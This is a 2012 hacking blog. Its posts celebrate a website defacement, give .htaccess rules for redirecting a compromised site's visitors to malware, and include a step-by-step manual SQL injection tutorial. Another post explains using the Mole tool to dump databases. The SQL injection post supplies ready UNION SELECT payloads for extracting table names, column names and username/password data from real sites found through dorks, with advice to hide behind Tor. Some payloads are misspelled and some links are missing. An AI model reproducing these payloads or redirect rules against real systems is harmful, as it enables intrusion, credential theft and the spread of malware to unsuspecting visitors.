Friday, February 24, 2012

how was hacked know the truth

Before some days was hacked by a hacker named exotz. it was pretty easy to upload a shell on that site so what he did is uploaded a image and then using live http headers he changed the file name and boom shell was uploaded and he also knew the location of the shell it was so it was not really hard one to deface...
the result 
he was doxed by anonymous group and they also found that team matrix helped exotz and doxed him also
result dont mess with the kings of hacking lulzz

Wednesday, February 22, 2012

How hackers infect websites with malware

hi guys today i am gonna show you how hackers sometimes infect sites with malware (recently if you are aware about Zone-h bring malwared )
So what we need

  1. shelled server
  2. writable .htacess
so open and edit .htacess add the following line of code

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ [R=301,L]
RewriteEngine On
ErrorDocument 400
ErrorDocument 401
ErrorDocument 403
ErrorDocument 404
ErrorDocument 500
and save it now your server will be infected with malware.. and if you open it in google chrome it will show you warning.. have FuN

Sunday, February 19, 2012

Indians Secure your SITE

i Rjcrystal is now launching a programme  in which any indian site who want to secure their site from being hacked will help them and will also give useful tips on securing sites and servers, i will also do a security audit if needed and thus will help Indians to secure their sites, this step has been taken due to recent attacks on indian sites and servers.
the basic tips i want to give you is

  1. use Latest linux kernels (because they are not rootable )
  2. USe latest php,joomla,cpanel,drupal,etc other CMS 
  3. CHMOD your public_html in such a way that no one can open it using a shell using (705 as chmod) this is for SHARED SERVERS ONLY 
  4. use some intrusion detection software which will help you and your team to detect from where attack was done. i prefer radware intrusion detection system.

Monday, February 13, 2012

Basics of SQL injection and Manual SQL injection tutorial

hi guys sorry due to some problems, i was away now back to work hope you liked my the mole tutorial
This time we have manual SQL tutorial , we know there are lots and lots of tools for SQL injection but manual SQl injection is the best way and that increases your knowledge ABOUT sql injection and hacking with databases POINTS TO remember:
No its not a book they are just here to make understanding process of SQL injection more clear.

  • websites who need take out most of their web site using scripts and other things have PHP SQL database (structured query language)  
  • what is relational databases: consider an example of ms excel in which there are 2 tables of which 1st one is having data of school teachers name and students name and other table has all their marks and recods. so when you ask for some ones mark then the sql query will search for name and the corresponding marks in this way it establishes a RELATION between 2 tables so its called RDBMs
  • information.schema is a database present in every MySQL database which has information about main database like no. of columns no. of tables etc. and we will get all our information from it only ;)
  • MySQL is one of the best RDBMS but due to lazy admins they can be easily hacked and Database can be released. because there are some security measures like MYSQL real escape ' will remove any " ' " from the request URL. and like even if there is a SQL error it should not show in the web page yes u can hide it that makes it extremely difficult for hackers to hack the site 
  • i am postiong tutorial about most common and Easily available vulnerability in that we can exploit easliy 
  • for hacking SQLi vulnerable sites we need an ID or something like that  hope you know that.
  • in general computer language Concatenate means making 2 or more things show together. like add function
NOw lets start

  • find a vulnerable site you can find the best dorks list here
  • then we need to find number of columns for that we will use order by function, here we have to guess the number of columns then use it like this increase the number 5  till you dont get error that unknown column X or anything but usually its not more than 30  
  • then when you get no. of columns we have to find vulnerable column (at the end you will get access to all the data bases but now we need a vulnerable column to speak out all database details on our commands ;)
  • then we will find VULNERABLE columns so that we can use our functions on it. To find vulnerable columns we need to use union select function for that we will first put ID=null in our url or ID=-12 a minus sign before id no. then will put union concatente function like this 
  • so we will get vulernable columns in numbers so what you get the number of vulnerable columns you have to USe them for injecting SQL lang.
  • now we will find the version of database server is using. so you have to just put version() on the vulnerable column and with same query. now your url will look like this. then if the version is =or < than 5 we will use union based technique if its less than 5 we have to use error based SQL injection. (suppose vulnerable column is 4 so we get)
  • so i assume that you have My sql version greater than 5.Now we will find no. of tables so that we can get our juicy info ;) to find no. of columns for that we will use 3 functions 
  1. "group_concat(table_name)" tells to show all tables in database, it put in place of vulnerable columns count.
  2. "from +information_schema.tables" tells to fetch information from information_schema.table (".table"  it shows that get table information as information_schema has many tables)
  3. +where+table_schema=database()-- it tells where tables are 
  • so our final URL looks like this  
ID=null+uninon+select+1,2,3,group_concat(table_name),5+from+information_schema.tables+ where+table_schema=database()--

  • now we have table names so we will now get columns for specific table or columns of all tables for that procedure is almost same just we have to change some functions 
  1. "group_concat(column_name)" column name instead of table name
  2. "from +information_schema.columns" tells to get data from columns (same way .columns shows that he wants data to be fetched from the section where all columns data is kept)
  3. +where+table_name="your table name here" (with QUotes)
  • so Our final URl looks like this 
ID=null+uninon+select+1,2,3,group_concat(column_name),5+from+information_schema.columns+ where+table_name="your table name here"--

  •  some times we are not allowed to use table name so we will convert them to ASCII code and use in this way  "char(your ascii code here)" and place it in place of table name and you are done :) you can convert your text to ASCII here 
  • Last step is Quite simple we have the columns name so we will see which ones are useful and then use SQL again to get columns data for example we want username and password (we always want this) so put an query like this 
ID=null+uninon+select+1,2,3,group_concat(ID,0x3a,username,0x0a,password,0x0a),5+from+your table name here--

  • So now we have the data one more thing 0x3a means colon so we will get result like this ID:username:password so that we can read it easily. for now this much only next time i will cover blind and downloading whole wordpress and other scritps database and SQL injection using XSS 
Hope you understand for any queries ask in comments
and yes make sure you use TOR onion routing because sometimes some sites detect thier usage and get your IP you can also be jailed for hacking attempts
USe this tutorial for educational and penetration testing purposes only, i am damn sure some of you will not do it lol

Monday, February 6, 2012

Acess your google chrome hidden power

HI guys this links reveal many things about your system configs,it can also track usages, and also any things try it List of Chrome URLs chrome://appcache-internals chrome://blob-internals chrome://bookmarks chrome://cache chrome://chrome-urls chrome://crashes chrome://credits chrome://dns chrome://downloads chrome://extensions chrome://flags chrome://flash chrome://gpu-internals chrome://histograms chrome://history chrome://ipc chrome://media-internals chrome://memory chrome://net-internals chrome://view-http-cache chrome://newtab chrome://plugins chrome://print chrome://quota-internals chrome://sessions chrome://settings chrome://stats chrome://sync-internals chrome://tcmalloc chrome://terms chrome://tracing chrome://version chrome://workers chrome://linux-proxy-config chrome://sandbox For Debug The following pages are for debugging purposes only. Because they crash or hang the renderer, they're not linked directly; you can type them into the address bar if you need them. chrome://crash/ chrome://kill/ chrome://hang/ chrome://shorthang/ chrome://gpuclean chrome://gpucrash chrome://gpuhang Any problems ask in comments

Thursday, February 2, 2012

the mole SQL injection tool tutorial

we all know that sql injection has been a biggest threat to all the websites one the internet
so we have sql injection tools to make our work easier some are gui some are CLI todat we have the mole name is pretty good lol but i am sure you will love this tools its damn easy to use on windows or linux. now i am posting a tutorial that will make you understand how to use it

  • get a vulnerable site 
  • get a keyword(string)
  • get the mole from here
  • then open it and enter url

  •  then get the keyword found in that site and put it like this 
 needle keyword 

  • then type

  • now it will try to inject and if its vulnerable then i will get database info,database name etc and other sensitive informations
  • now to get tables from a data base type this. where db_name is your database name 
tables db_name 

  • then to get columns from a table type this 
columns DB_name table_name 

  • now you will get columns, to get that juicy data type, column name are seperated by comma (,)
query db_name table_name column1,columns2

  •  then copy data and use like you want, and there are some more functions that you can use like read file,dbinfo,headers,cookies,etc this is only a basic tutorial if you dont get this goto this video directly press tab to get all functions 

Any problems ask in comments

Twitter Delicious Facebook Digg Stumbleupon Favorites More